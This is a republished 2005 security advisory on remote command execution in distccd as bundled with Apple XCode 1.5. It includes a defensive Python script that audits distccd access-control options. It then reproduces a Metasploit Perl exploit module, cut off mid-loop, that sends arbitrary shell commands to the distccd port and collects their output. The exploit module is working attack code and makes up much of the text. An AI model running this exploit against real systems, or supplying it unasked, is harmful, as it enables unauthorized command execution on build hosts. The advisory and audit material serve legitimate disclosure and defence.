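XCode 1.5 and distcc 2.x Possible Arbitrary Code Execution Vulnerability
2008-04-09 04:24:54 Source: Internet
Published: 2005-03-10
Updated: 2005-03-11
Affected systems:
Apple XCode 1.5
Samba distcc 2.x
Description:
distcc is a program for distributing builds of C, C++, Objective C or Objective C++ code across multiple machines on a network.
XCode 1.5, as bundled by Apple, allows distributed compilation. This feature actually uses the Samba distcc module (http://distcc.samba.org). An attack against distccd now exists that allows a remote attacker to access the target machine with full user-level privileges.
XCode bundles version 2.0.1 of distcc. A similar problem remains even after upgrading to version 2.18.3.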
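A defender-side check for the exposure described above, as an added example that is not part of the original advisory or of distcc: it audits distccd command lines for the `--allow` and `--listen` access-control options documented in the distccd manual, assuming a distccd build that supports them. The sample command lines and the list of "internal" networks are constructed assumptions.

```python
import ipaddress
import shlex

# Assumption: ranges treated as "internal" for this audit (RFC 1918 + loopback).
INTERNAL = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Constructed sample command lines, e.g. as collected from `ps` on build hosts.
SAMPLES = [
    "distccd --daemon",
    "distccd --daemon --allow 0.0.0.0/0 --listen 192.168.10.5",
    "distccd --daemon --allow=192.168.10.0/24 --listen 192.168.10.5",
]

def audit_distccd(cmdline):
    """Return a list of access-control findings for one distccd command line."""
    args = shlex.split(cmdline)[1:]
    allow, listen, findings = [], [], []
    i = 0
    while i < len(args):
        name, eq, value = args[i].partition("=")
        if name in ("-a", "--allow", "--listen"):
            if not eq:  # value given as the next argument
                i += 1
                value = args[i] if i < len(args) else ""
            (listen if name == "--listen" else allow).append(value)
        i += 1
    if not allow:
        findings.append("no --allow: any host that reaches the port can submit jobs")
    for spec in allow:
        try:
            net = ipaddress.ip_network(spec, strict=False)
        except ValueError:
            findings.append(f"--allow {spec}: not a valid IP[/BITS] value")
            continue
        if net.version != 4 or not any(net.subnet_of(n) for n in INTERNAL):
            findings.append(f"--allow {spec}: extends beyond the internal ranges")
    if not listen or "0.0.0.0" in listen:
        findings.append("no specific --listen address: daemon binds all interfaces")
    return findings

if __name__ == "__main__":
    for line in SAMPLES:
        print(line)
        for finding in audit_distccd(line) or ["ok"]:
            print("   ", finding)
```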
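<*Source: Ray Slakinski (rays@sdf1.net)
Jason McLeod (jason@sdf1.net)
H D Moore (sflist@digitaloffense.net)
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=111047639409069&w=2
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use it at your own risk!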
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::distcc_exec;
use base "Msf::Exploit";
use Pex::Text;
use strict;

my $advanced = { };
my $info =
{
    'Name' => 'DistCC Daemon Command Execution',
    'Version' => '$Revision: 1.6 $',
    'Authors' => [ 'H D Moore <hdm [at] metasploit.com>'],
    'Arch' => [ ],
    'OS' => [ ],
    'Priv' => 0,
    'UserOpts' => {
        'RHOST' => [1, 'ADDR', 'The target address'],
        'RPORT' => [1, 'PORT', 'The distccd server port', 3632],
    },
    'Payload' => {
        'Space' => 1024,
        'Keys' => ['cmd', 'cmd_bash'],
    },
    'Description' => Pex::Text::Freeform(qq{
        This module uses a documented security weakness to execute
        arbitrary commands on any system running distccd.
    }),
    'Refs' => [ ['URL', 'http://distcc.samba.org/security.html'], ],
    'Keys' => ['distcc'],
};

sub new {
    my $class = shift;
    my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
    return($self);
}

sub Exploit {
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $shellcode = $self->GetVar('EncodedPayload')->RawPayload;
    my ($res, $len);

    my $s = Msf::Socket::Tcp->new
    (
        'PeerAddr' => $target_host,
        'PeerPort' => $target_port,
        'LocalPort' => $self->GetVar('CPORT'),
        'SSL' => $self->GetVar('SSL'),
    );
    if ($s->IsError) {
        $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
        return;
    }

    my $distcmd = $self->DistCommand("sh", "-c", $shellcode);
    $s->Send($distcmd);

    my $app = "DOTI0000000A"."METASPLOIT\n";
    $s->Send($app);

    $res = $s->Recv(24, 5);
    if (! $res || length($res) != 24) {
        $self->PrintLine("[*] The remote distccd did not reply to our request");
        return;
    }

    # Check STDERR
    $res = $s->Recv(4, 5);
    $res = $s->Recv(8, 5);
    $len = unpack('N', pack('H*', $res));
    if ($len) {
        $res = $s->Recv($len, 5);
        foreach (split(/\n/, $res)) {
            $self->PrintLine("stderr: $_");
        }
    }

    # Check STDOUT
    $res = $s->Recv(4, 5);
    $res = $s->Recv(8, 5);
    $len = unpack('N', pack('H*', $res));
    if ($len) {
        $res = $s->Recv($len, 5);
        foreach (split(/\n/, $res)) {